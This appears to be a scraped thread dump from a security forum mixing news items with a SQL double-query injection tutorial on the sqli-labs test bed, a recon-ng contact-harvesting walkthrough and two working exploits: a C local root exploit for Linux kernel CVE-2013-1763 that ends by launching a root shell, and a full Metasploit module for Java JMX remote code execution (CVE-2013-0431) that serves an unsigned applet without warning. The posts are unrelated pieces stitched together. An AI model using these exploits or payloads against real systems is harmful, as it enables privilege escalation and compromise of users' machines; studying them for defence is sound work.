- oss-sec: CVE request -- Linux kernel: mm: thp: pmd_present and PROT_NONE local DoS
- oss-sec: Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871)
You can have a look at them. It is not hard to mmap at the right address.
-
Story of a Client-Side Attack 1. Introduction During an ethical hacking project the experts of Silent Signal LLC were mandated to elevate their privileges on the restricted workstations of the client. Taking into account the relatively strict host and network controls in place, we decided to share some of our experiences gathered during the project. Naturally, in accordance with our contracts, the identifying information about the client and other sensitive data was removed or changed. Download: www.exploit-db.com/download_pdf/24554
-
I saw that Internet Explorer 10 came out today and thought I'd give it a try. First test: SunSpider JavaScript Benchmark. Results: 1. Internet Explorer 10.0.9200 (Total: 112.4ms +/- 0.7%) 2. Google Chrome 25.0.1364 (Total: 154.3ms +/- 1.6%) 3. Mozilla Firefox 19.0 (Total: 183.3ms +/- 1.3%) This is just to get the attention of the "haters". I'll come back with more if I have time to test further.
-
DOUBLE QUERY INJECTIONS DEMYSTIFIED
Audi-1
February 27, 2013

In the last article of the series, we started to explore the world of SQL injections by discussing the different types and using the test bed available at https://github.com/Audi-1/sqli-labs. You can review the last post here. Now we will explore SQL injections even further and discuss error-based double query injections, which are sometimes called subquery injections. Some people also refer to them as blind injections, but I prefer to call them error-based, as we will be using the errors to dump the information back to us. This also follows the classification scheme we discussed in part 1. I will use the first post as a base and refer to it to explain the next part. For this post, we will use Less-5 and Less-6 of the SQLI-LABS test bed.

Let's start with the same enumeration process as discussed in the last article and see how it goes from there. We observe that Less-5 and Less-6 look similar to the earlier lessons, but with a very subtle difference. In the earlier lessons we were getting the username and password back on the screen, but here we only get the message "You are in........." Even if we iterate over the parameter ID with values from 1 to 14, we get the same response.

ANALYSIS OF THE ENUMERATION

ID=1 => You are in.........
ID=2 => You are in.........
ID=3 => You are in.........
ID=4 => You are in.........
ID=5 => You are in.........
ID=6 => You are in.........
ID=7 => You are in.........
ID=8 => You are in.........
ID=9 => You are in.........
ID=10 => You are in.........
ID=11 => You are in.........
ID=12 => You are in.........
ID=13 => You are in.........
ID=14 => You are in.........
ID=15 => no output
ID=0 => no output
ID=99 => no output
ID=string => no output

RESULT OF ENUMERATION: The application has 14 different entities; it returns "You are in..." for a valid entity but returns a blank response for an invalid one.
FUZZING: As explained in the previous article, we fuzz the application to see if we can find traces of injection possibilities and to learn how the application reacts to our malicious inputs.

Integer or string test: Because the input looks like an integer, we test whether the parameter is a real integer or whether it also accepts a string. For this, we inject a string into the parameter ID and examine the response. We observe that the application does not crash; it treats the string input the same as a non-existent value.

Some other injections could be as follows: ' " \ ; %00 ) ( aaa

Using these, we observe that the application crashes, giving a MySQL error:

Less-5: http://localhost/sqli-labs/Less-5/?id=1'
Less-6: http://localhost/sqli-labs/Less-6/?id=1'

So by injecting a single quote, we observe that Less-5 produces a MySQL error whereas Less-6 does not. The reverse happens if we inject a double quote instead:

Less-5: http://localhost/sqli-labs/Less-5/?id=1"
Less-6: http://localhost/sqli-labs/Less-6/?id=1"

IMPORTANT NOTE: From the enumeration and fuzzing process we learned that the database does not reflect any output back to the web page, therefore we cannot use UNION SELECT to dump the database information. The only information we see reflected back from the database on the web page is in the form of MySQL errors. Therefore, we need to craft our queries in such a way that we are able to dump the database information through errors. The query must be syntactically correct, so that it is accepted by the DB driver and passed on to the backend database for execution; it should then produce a logical (runtime) error and dump the information we want as part of the error string returned. (Confused? Don't worry, we will clear it up shortly.)

Guessing the query: From the fuzzing we did, we learned some useful information about the application. Now it's time to guess the backend query.
We observed that Less-5 produces an error with the addition of a single quote, and Less-6 produces an error with the addition of a double quote. To make sure that only single or double quotes are used to wrap the variable in the original query, we try to break the application with the addition of the escape character \.

Less-5: http://localhost/sqli-labs/Less-5/?id=1\

On Less-5, look at the part of the error dumped on the screen that contains 1\, which is: near ''1\' LIMIT 0,1' at line 1. We observe that, after our input of 1\, a single quote is visible, indicating that single quotes are used as the wrapper for the string.

Less-6: http://localhost/sqli-labs/Less-6/?id=1\

On Less-6, look at the part of the error that contains 1\, which is: near '"1\" LIMIT 0,1' at line 1. We observe that, after our input of 1\, a double quote is visible, indicating that only double quotes are used as the wrapper for the string.

COMMENTING OUT THE REST OF THE QUERY

Since we discovered that Less-5 uses single quotes as string boundaries, we now inject a quote and add a comment at the end to fix the query:

ID=1' --+

For Less-6, we can use this injection to fix the query:

ID=1" --+

Therefore, after effective guessing, the query would be:

Less-5: SELECT * FROM table_name WHERE ID='Value we inject' LIMIT 0,1
Less-6: SELECT * FROM table_name WHERE ID="Value we inject" LIMIT 0,1

UNDERSTANDING SUBQUERIES:

Before we proceed further with SQL injection, we need to understand the basics of subqueries. A subquery is a query placed inside an existing query, or one query cascaded inside another. The objective is to dynamically produce the result of the inner query and then get the result of the final query. Let's try to understand it with an example:

SELECT concat((select database()));

In the above query, the inner part, (select database()), is the subquery; it gets evaluated first, and its result is then passed to the concat function.
This returns a string equal to the name of the currently selected database, which is then evaluated by the outer SELECT. The outer part thus evaluates a string constant that is actually the name of the database currently in use.

SQL INJECTIONS

In this type of query injection we will be using specific functions available in the backend database. If you are not familiar with them, please look them up before proceeding.

1. Rand()
2. Floor()
3. Count()
4. Group by clause

Some great researchers figured out that using a GROUP BY clause along with an aggregate function like count(*) produced an error message dumping part of the query as an error message, which is how double query injections evolved. Let us start with the basic building blocks and proceed to build a complete, complex query. We will perform these experiments in the MySQL client and interact directly with the database to understand the concepts.

# mysql -u root -ptoor   (toor is the default password of the MySQL root account on BackTrack; change it as per your deployment.)

mysql> use security;   -- name of our database
mysql> SELECT concat((select database()));   -- dumps out the current database name as a string
mysql> SELECT concat('string1','string2');   -- dumps out the two strings as one big string

(Note: it does not matter whether you use single quotes or double quotes to wrap your strings.)

Now let us look at the functions mentioned above in the article.

mysql> SELECT rand();   -- returns a random value less than 1 every time it is run
mysql> SELECT floor(1.1123456);   -- returns the integer part and discards all decimals

We can now group these functions together:

mysql> SELECT floor(rand()*2);   -- create a random value, multiply it by 2 and then floor it; the result is either 0 or 1

Try it a couple of times and see for yourself. Now let us combine the things we learned so far to make some useful output.
Let's execute the following query:

mysql> SELECT CONCAT((SELECT database()), FLOOR(RAND()*2));

Analyzing the query: we have a nested query here, in which we wrapped one query inside another. When this query executes, it first evaluates SELECT database(), along with RAND()*2, whose output is passed to FLOOR(); the two outputs are then concatenated, giving a string that ends with 0 or 1. Now if we run this query against any standard MySQL database table, it returns SECURITY0 or SECURITY1 at random.

Now let's add the GROUP BY clause to the query. This time, let's use the information_schema.tables or information_schema.columns tables to dump the results. The columns table has some 100+ entries, which is good for checking the random output. The GROUP BY clause hands us the distinct entries from the column.

mysql> select concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a;

The label or alias "a" is added to display the column name as "a", which can then be referenced by the GROUP BY clause.

IMPORTANT: From here on, the inner query SELECT database() can be replaced by any other query whose result we would like to get as a string in the MySQL error, such as SELECT version(), user(), datadir(), or the complete enumeration of columns, tables or other databases as discussed in part 1.

Time to get the magic going:

mysql> select count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a;

This gets us an error that contains our string:

ERROR 1062 (23000): Duplicate entry 'security1' for key 'group_key'

Kudos again to all those brilliant minds who found the deadly combination of an aggregate function with a GROUP BY clause and repeating values, which makes a syntactically correct query that produces a runtime error when executed.
Let us change the inner query to test something else:

mysql> select count(*), concat((select version()), floor(rand()*2)) as a from information_schema.tables group by a;

Some fancy characters can be concatenated to distinguish the trailing 0 or 1 from our string:

mysql> select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a;

Error:

ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

Let us now try to implement this logic through the front-end web application. But before we proceed there, we need to look at another aspect, called a derived table. The complete query we used above to produce an error can be used as a table in another query, something like:

select 1 from (table name);

Why we need to do this is explained in the video lessons that accompany the original article, which include a complete walkthrough of this article:

mysql> select 1 from (select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a)x;
ERROR 1062 (23000): Duplicate entry '~root@localhost~0' for key 'group_key'

http://localhost/sqli-labs/Less-5/?id=1'+AND+(select+1+from+(select+count(*),+concat('~',(select+user()),'~',+floor(rand()*2))as+a+from+information_schema.tables+group+by+a)x)--+

Replacing the internal query with what we want to extract gets us our output in the form of MySQL errors.

Sursa: http://resources.infosecinstitute.com/double-query-injections-demystified/
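The same building blocks seen from the defender's side, as an added example that is not part of the original article or of sqli-labs. The first half scans constructed web-server access-log lines (the hosts, timestamps and status codes are made up; the two injected requests carry the Less-5 and Less-6 payload shown above) for the count()/floor()/rand()/GROUP BY combination that error-based double queries depend on. The second half puts the Less-5 query shape built by string splicing next to a parameterized version, using an in-memory SQLite table as a stand-in for MySQL so that the error leak and its fix run offline. The names scan_log, classify_request, lookup_vulnerable and lookup_parameterized are mine.

```python
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (hosts, timestamps and sizes are made up). Lines 3 and 4 carry
# the error-based double-query payload from the article, against Less-5 (single quote) and
# Less-6 (double quote, sent as %22); the other lines are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Feb/2013:10:01:02 +0000] "GET /sqli-labs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [27/Feb/2013:10:01:09 +0000] "GET /sqli-labs/Less-5/?id=14 HTTP/1.1" 200 512
10.0.0.7 - - [27/Feb/2013:10:02:30 +0000] "GET /sqli-labs/Less-5/?id=1'+AND+(select+1+from+(select+count(*),concat('~',(select+user()),'~',floor(rand()*2))as+a+from+information_schema.tables+group+by+a)x)--+ HTTP/1.1" 500 233
10.0.0.7 - - [27/Feb/2013:10:02:41 +0000] "GET /sqli-labs/Less-6/?id=1%22+AND+(select+1+from+(select+count(*),concat((select+version()),floor(rand()*2))as+a+from+information_schema.columns+group+by+a)x)--+ HTTP/1.1" 500 240
10.0.0.9 - - [27/Feb/2013:10:03:00 +0000] "GET /sqli-labs/Less-6/?id=7 HTTP/1.1" 200 512
"""

# Decoded form of the Less-5 payload above, reused for the query demonstration below.
PAYLOAD = ("1' AND (select 1 from (select count(*),concat('~',(select user()),'~',"
           "floor(rand()*2))as a from information_schema.tables group by a)x)--+")

# Common log format: client, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# All four must appear together: an aggregate plus GROUP BY over a value that flips
# between ...0 and ...1 is the pattern the article assembles step by step.
DOUBLE_QUERY_MARKERS = ("count(", "floor(", "rand(", "group by")


def decode_query(url):
    """URL-decode the query string (+ and %XX), collapse whitespace and lower-case it."""
    query = unquote_plus(urlsplit(url).query)
    return re.sub(r"\s+", " ", query).lower()


def classify_request(url):
    """Return 'double_query_injection', 'quote_probe' or 'benign' for one request URL."""
    q = decode_query(url)
    if all(marker in q for marker in DOUBLE_QUERY_MARKERS):
        return "double_query_injection"
    if any(ch in q for ch in ("'", '"', "\\")):
        return "quote_probe"   # the article's fuzzing step: ' " \ sent to an integer parameter
    return "benign"


def scan_log(text):
    """Return (ip, verdict, status) for every non-benign request found in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["url"])
        if verdict != "benign":
            findings.append((m["ip"], verdict, m["status"]))
    return findings


def demo_db():
    """In-memory SQLite table standing in for the sqli-labs users table (rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(conn, user_input):
    """The Less-5 shape: the value is spliced inside single quotes. Whatever database error
    the application echoes back becomes the channel the article reads data through."""
    sql = "SELECT id, username FROM users WHERE id='%s' LIMIT 1" % user_input
    try:
        return ("ok", conn.execute(sql).fetchone())
    except sqlite3.Error as exc:
        return ("db_error", str(exc))


def lookup_parameterized(conn, user_input):
    """Hardened shape: the value is bound as a parameter, so quotes and comments stay data."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ? LIMIT 1", (user_input,)
    ).fetchone()


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("ALERT", *finding)
    conn = demo_db()
    print("vulnerable, id=1:      ", lookup_vulnerable(conn, "1"))
    print("vulnerable, payload:   ", lookup_vulnerable(conn, PAYLOAD))
    print("parameterized, payload:", lookup_parameterized(conn, PAYLOAD))
```

Two points the run makes visible: the detector only fires when all four markers occur together, so a single quote on its own is reported as a probe rather than as a double query; and the parameterized lookup returns no row and no error for the payload, which removes the MySQL error string the technique relies on. Keeping database errors out of HTTP responses closes the same channel from the other end.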
-
[h=1]Stuxnet Missing Link Found, Resolves Some Mysteries Around the Cyberweapon[/h] By Kim Zetter 02.26.13 12:40 PM Iranian President Mahmoud Ahmadinejad touring the Natanz enrichment facility in April 2008 during the time that Stuxnet is already believed to have been unleashed on computers in Iran. Photo courtesy of the Iranian president’s office As Iran met in Kazakhstan this week with members of the UN Security Council to discuss its nuclear program, researchers announced that a new variant of the sophisticated cyberweapon known as Stuxnet had been found, which predates other known versions of the malicious code that were reportedly unleashed by the U.S. and Israel several years ago in an attempt to sabotage Iran’s nuclear program. The new variant was designed for a different kind of attack against centrifuges used in Iran’s uranium enrichment program than later versions that were released, according to Symantec, the U.S-based computer security firm that reverse-engineered Stuxnet in 2010 and also found the latest variant. The new variant appears to have been released in 2007, two years earlier than other variants of the code were released, indicating that Stuxnet was active much earlier than previously known. A command-and-control server used with the malware was registered even earlier than this, on Nov. 3, 2005. Like three later versions of Stuxnet that were released in the wild in 2009 and 2010, this one was designed to attack Siemens PLCs used in Iran’s uranium enrichment program in Natanz. But instead of changing the speed of spinning centrifuges controlled by the PLCs, as those later versions did, this one focused on sabotaging the operation of valves controlling the flow of uranium hexafluoride gas into the centrifuges and cascades — the structure that connects multiple centrifuges together so that the gas can pass between them during the enrichment process. 
The malware’s goal was to manipulate the movement of gas in such a way that pressure inside the centrifuges and cascade increased five times the normal operating pressure. “That would have very dire consequences in a facility,” says Liam O’Murchu, manager of security response operations for Symantec. “Because if pressure goes up, there’s a good chance the gas will turn into a solid state, and that will cause all sorts of damage and imbalances to the centrifuges.” The new finding, described in a paper released by Symantec on Tuesday (.pdf), resolves a number of longstanding mysteries around a part of the attack code that appeared in the 2009 and 2010 variants of Stuxnet but was incomplete in those variants and had been disabled by the attackers. The 2009 and 2010 versions of Stuxnet contained two attack sequences that each targeted different models of PLCs made by Siemens being used in Iran’s uranium enrichment plant — the Siemens S7-315 and S7-417 models of PLC. In these later variants of Stuxnet, however, only the 315 attack code worked. The 417 attack code had been deliberately disabled by the attackers and was also missing important blocks of code that prevented researchers from determining definitively what it was designed to do. As a result, researchers have long guessed that it was used to sabotage valves, but couldn’t say for certain how it affected them. There were also mysteries around why the attack code was disabled — was it disabled because the attackers had failed to finish the code or had they disabled it for some other reason? The 2007 variant resolves that mystery by making it clear that the 417 attack code had at one time been fully complete and enabled before the attackers disabled it in later versions of the weapon. 
And because the 2007 variant only contained the 417 attack code — with no code attacking the Siemens 315 PLC — it appears that the attackers disabled the 417 code in later versions because they wanted to change their tactics, dropping their focus on sabotaging the valves in order to focus instead on sabotaging the spinning centrifuges. Sursa[complet]: Stuxnet Missing Link Found, Resolves Some Mysteries Around the Cyberweapon | Threat Level | Wired.com
-
Black hat greed reducing software vulnerability report rate
Nytro posted a topic in Stiri securitate
[h=2]Black hat greed reducing software vulnerability report rate[/h] Zero-day market temptation: Cash out or collaborate? By Iain Thomson in San Francisco RSA 2013 HP has kicked off the round of reports that accompany each RSA conference with its analysis of security vulnerabilities, and has revealed that although the overall trend is positive, the growing market for zero-day flaws is reducing the number of the most serious problems that are disclosed. The long-term trend looks pretty good, but... The number of software vulnerabilities has continued its overall downward trend from its 2006 peak, but while the numbers of the most critical threats hasn't fallen much, HP researchers have seen a reduction in the number of serious vulnerabilities that are actually reported. HP attributes that slippage to the growing market for vulnerability data. "We think a lot of these vulnerabilities are being sold in the black market or the grey one," Mark Painter, marketing manager for Fortify HP enterprise security, told The Register. "The growth of the grey market and the worth of vulnerabilities in dollars must have a reducing effect on the number of public disclosures that we see," Painter told us. "Those dollars are there, and anything that goes down [the grey channel] doesn't become public." Four of the six most common vulnerabilities are aimed primarily or solely at web applications: SQL injection, cross-site scripting, cross-site request forgery, and remote file inclusion. Together these account for 4 per cent of the total. On the mobile front, the HP team tested a very small sample of 70 apps and found a host of problems. Over 37 per cent of applications had passwords that could be beaten using basic methods (such as Apple's latest passcode-bypass woes), and 77 per cent had information-leakage flaws. 
There was a relatively low rate for XSS vulnerabilities in mobile, with an unlucky 13 per cent of mobile apps at risk, but the data showed a worrying preponderance of financial and database management apps in the sample. Elsewhere, HP reported a huge increase in the number of SCADA (supervisory control and data acquisition) vulnerabilities detected, the numbers of which have risen 68 per cent over the last five years. This likely reflects that people are more actively looking for such things post-Stuxnet, rather than any inherent instability in SCADA code. ® Sursa: Black hat greed reducing software vulnerability report rate • The Register -
[h=2]Adobe squashes TWO critical Flash vulnerabilities with emergency patches[/h] Two out of three threats are dangerous, being used in wild By Jack Clark in San Francisco Adobe published a critical Flash Player update on Tuesday to fix three exploits, two of which are under active attack by hackers. Two of the three vulnerabilities are being used by nefarious folk, Adobe said, and one of these two explicitly targets the Firefox browser. Adobe introduced the Flash Player sandbox a year ago to protect Firefox users from vulnerabilities in Flash. It appears this is now being targeted for permission escalation attacks. "Adobe is aware of reports that CVE-2013-0643 and CVE 2013-0648 are being exploited in the wild in targeted attacks designed to trick the user into clicking a link which directs to a website serving malicious Flash (SWF) content," the company wrote in a security bulletin. Adobe classified the update with a priority rating of 1 (do it now if you value your computer) for Windows and Macintosh systems, and 3 (install at your discretion) for Linux kit. Google and Microsoft are applying automatic fixes to the integrated Adobe Flash Player code found in Chrome and in Internet Explorer 10 for Windows 8. The updates resolve a permissions issue with the Flash Player Firefox sandbox (CVE-2013-0643), a vulnerability in the ExternalInterface ActionScript feature (CVE-2013-0648), and a buffer overflow vuln in the Flash Player broker service (CVE-2013-0504). Links to download the fix are available from Adobe's website, as listed in the security bulletin. The timing of the patch jars with Adobe's as-of-November-2012 commitment to try and issue security patches in a more measured pattern that coincides with Microsoft's Patch Tuesday. ® Sursa: Adobe squashes TWO critical Flash vulnerabilities with emergency patches • The Register
-
Kernel Attacks Through User-Mode Callbacks Authored by Tarjei Mandt In this paper, the author discusses the many challenges and problems concerning user-mode callbacks in win32k. In particular, they show how win32k's dependency on global locks in providing a thread-safe environment does not integrate well with the concept of user-mode callbacks. Although many vulnerabilities related to user-mode callbacks have been addressed, their complex nature suggests that more subtle flaws might still be present in win32k. Thus, in an effort to mitigate some of the more prevalent bug classes, they conclude with some suggestions as to how users may protect themselves against future kernel attacks. Download: http://dl.packetstormsecurity.net/papers/win/mandt-win32k-paper.pdf Sursa: Kernel Attacks Through User-Mode Callbacks - Packet Storm
-
Today the vast majority of ATMs worldwide use a Microsoft Windows OS, primarily Windows XP Professional or Windows XP Embedded.[citation needed] A small number of deployments may still be running older versions of Windows OS such as Windows NT, Windows CE, or Windows 2000. Automated teller machine - Wikipedia, the free encyclopedia
-
[h=1]Cyber attack on 60 Romanian websites by a Syrian hacker[/h] [h=3]A hacker from Syria has attacked more than 60 Romanian websites, for political reasons.[/h] Omar Salloum, or Syrian StOrm (Syrian Storm) as he calls himself on Facebook, announced on the social network that he had hacked more than 60 apparently random websites from Romania, being upset by the Romanian Government's political position towards his country. The Romanian Government condemns Syria's recent aggressive actions and considers that international law is being violated and that regional stability and security are being put at risk. Romania has Turkey on its side, which shares the same political views. The international press maintains that the conflict in Syria is fuelled and organised by foreign forces, with the help of "terrorists" who collaborate with the Al-Qaida network, says Syrian president Bashar al-Assad in his first televised speech in the last three months, Mediafax reports. Here are the sites that were hacked by the Syrian: .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Valcea 1 - Televiziunea de Valcea GAL Valea Tutovei si Zeletinului | Just another WordPress site .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. WileyX Romania Servicii psihoterapie Iasi .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. http://valseb.ro/ Hosting account suspended Usi Porta Doors .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Lisa Shop | Lisa Accessories Lifecoaching, Simon Eniko, trainer, curs reiki, pictura pe matase Actualitatea Online | Saptamanal pentru oameni inteligenti | Lugoj .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::.
ArhivaFoto.ro - Banca de fotografii http://primarianecsesti.ro/ Pronosticuri sportive profesioniste .:: Hacked by Th3 Syrian St0rm ::. V for Verde — Bucur?-te de via??! .:: Hacked by Th3 Syrian St0rm ::. http://tryonemanshow.eu/ Unitate In Romania .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. http://uberuan.ro/ .:: Hacked by Th3 Syrian St0rm ::. Transport MVO Avocat Eugen Preda is coming soon Hosting account suspended http://vorwerk-thermomix.ro/ http://bionek.ro/ thermomix ... site-ul oficial thermomix - Romania http://terapieacasa.ro/ http://terapia-naturista.ro/ Centrul Vywamus Romania Hosting account suspended Mesaje de dragoste,iubire,noapte buna,la multi ani etc. http://regen.ro.im/ http://steauadiminetii.ro/ .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Totul despre stil .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Home: www.denic.de .:: Hacked by Th3 Syrian St0rm ::. SkirtBike Baia Mare - Don't complain about the news, it comes from Atac cibernetic asupra a 60 de siteuri din Romania de un hacker sirian. Even stranger, I found it via ProSport.
-
CVE-2013-1763 SOCK_DIAG netlink Linux kernel 3.3-3.8 exploit
Nytro replied to Nytro's topic in Exploituri
Archlinux:

// archer.c
//
// 2012 sd@fucksheep.org
//
// Works reliably against x86-64 3.3-3.7 arch.
//
// Tested against:
//
// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
// ...

#include <assert.h>

#define JUMP 0x0000100000001000LL
#define BASE 0x380000000
#define SIZE 0x010000000
#define KSIZE 0x2000000

static long ugid;

void patch_current() {
  int i,j,k;
  char *current = *(char**)(((long)&i) & (-8192));
  long kbase = ((long)current)>>36;
  for (i=0; i<4000; i+=4) {
    long *p = (void *)&current[i];
    int *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) {
      for (k = 0; k < 8; k++)
        if (((int*)&ugid)[k%2] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
      next:;
    }
  }
}

int main() {
  long u = getuid();
  long g = getgid();
  int i, f = socket(16,3,4);
  static int n[10] = {40,0x10014,0,0,45,-1};
  assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);
  setresuid(u,u,u); setresgid(g,g,g);
  ugid = (g<<32)|u;
  memcpy(1<<12, &patch_current, 1024);
  for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
  send(f, n, sizeof(n), 0);
  setuid(0);
  return execl("/bin/bash", "-sh", 0);
}

Sursa: oss-sec: Archlinux/x86-64 3.1.x-3.7.x x86-64 CVE-2013-1763 sock_diag_handlers[] warez
-
Discover Contacts And Domains With Recon-ng

Automation is really important in penetration testing engagements because it helps the penetration tester save time and give more attention to other activities. For that reason many pentesters put effort into building tools to assist them with a variety of tasks. One such tool is recon-ng, which performs web-based reconnaissance and can be used in social engineering engagements or for extracting information that exists on the web. In this article we will examine how we can use the Recon-ng framework to discover different types of information.

We can type help in the framework in order to see a list of all the available commands.

(Screenshot: recon-ng – commands)

We can see that there is a command named modules. We type that command to check the existing modules that we can use. The next image shows a sample of the available modules.

(Screenshot: recon-ng – sample of the available modules)

There is a module called contacts_jigsaw. Jigsaw is a website similar to LinkedIn that contains a large database of business contacts. So let's say that we want to discover the contacts of a company that exists on Jigsaw. We load the module with the command load contacts_jigsaw and set the domain of our preference.

(Screenshot: load jigsaw module)

In the next image we can see a sample of the output:

(Screenshot: recon-ng – Gathering Contacts)

Now that we have some contacts, we can try to use the Google module to discover additional domains of the same company.

(Screenshot: discover hosts via google)

In the image below we can see a sample of the results that recon-ng has produced.

(Screenshot: Discovering subdomains with recon-ng)

Recon-ng also gives us the ability to export the results in CSV format or as an HTML file.
(Screenshot: Save the results in HTML file)

You can see the output of the report in the next two images:

(Screenshot: recon-ng – Report)
(Screenshot: recon-ng report contacts)

Conclusion

Recon-ng is a great framework that can help in the information gathering stage of a penetration test. The tool is really simple to use and it keeps every result in its database for later use. The report it generates is well formatted, and if additional modules are added to the framework in the future, it will be part of every penetration tester's toolkit.

Sursa: Discover Contacts And Domains With Recon-ng | Penetration Testing Lab
-
[h=1]Java Applet JMX Remote Code Execution[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java Applet JMX Remote Code Execution',
      'Description'    => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in February of 2013.
        Additionally, this module bypasses default security settings introduced in Java 7
        Update 10 to run unsigned applet without displaying any warning to the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'Adam Gowdiak', # Vulnerability discovery
          'SecurityObscurity', # Exploit analysis and deobfuscation
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0431' ],
          [ 'OSVDB', '89613' ],
          [ 'BID', '57726' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
          [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
          [ 'URL', 'http://pastebin.com/QWU1rqjf' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
        ],
      'Platform'       => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 19 2013'
    ))
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      print_status("Sending JAR")
      # cli is passed through so the payload can be regenerated for this client
      send_response( cli, generate_jar(cli), { 'Content-Type' => "application/octet-stream" } )
    when /\/$/
      print_status("Sending HTML")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_jar(cli)
    paths = [
      [ "Exploit.ser" ],
      [ "Exploit.class" ],
      [ "B.class" ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0,idx].join("/") + "/"
        if !(jar.entries.map{|e|e.name}.include?(full))
          jar.add_file(full, '')
        end
      end
      fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb")
      data = fd.read(fd.stat.size)
      jar.add_file(path.join("/"), data)
      fd.close
    end

    return jar.pack
  end

  def generate_html
    html = <<-EOF
<html>
<script language="Javascript">
  var _app = navigator.appName;
  if (_app == 'Microsoft Internet Explorer') {
    document.write('<applet archive="#{rand_text_alpha(4+rand(4))}.jar" object="Exploit.ser"></applet>');
  } else {
    document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>');
  }
</script>
</html>
EOF
    return html
  end

end

Sursa: Java Applet JMX Remote Code Execution
-
Cracking the Defender: The Deobfuscated Code
Dejan Lukan
February 25, 2013

Introduction

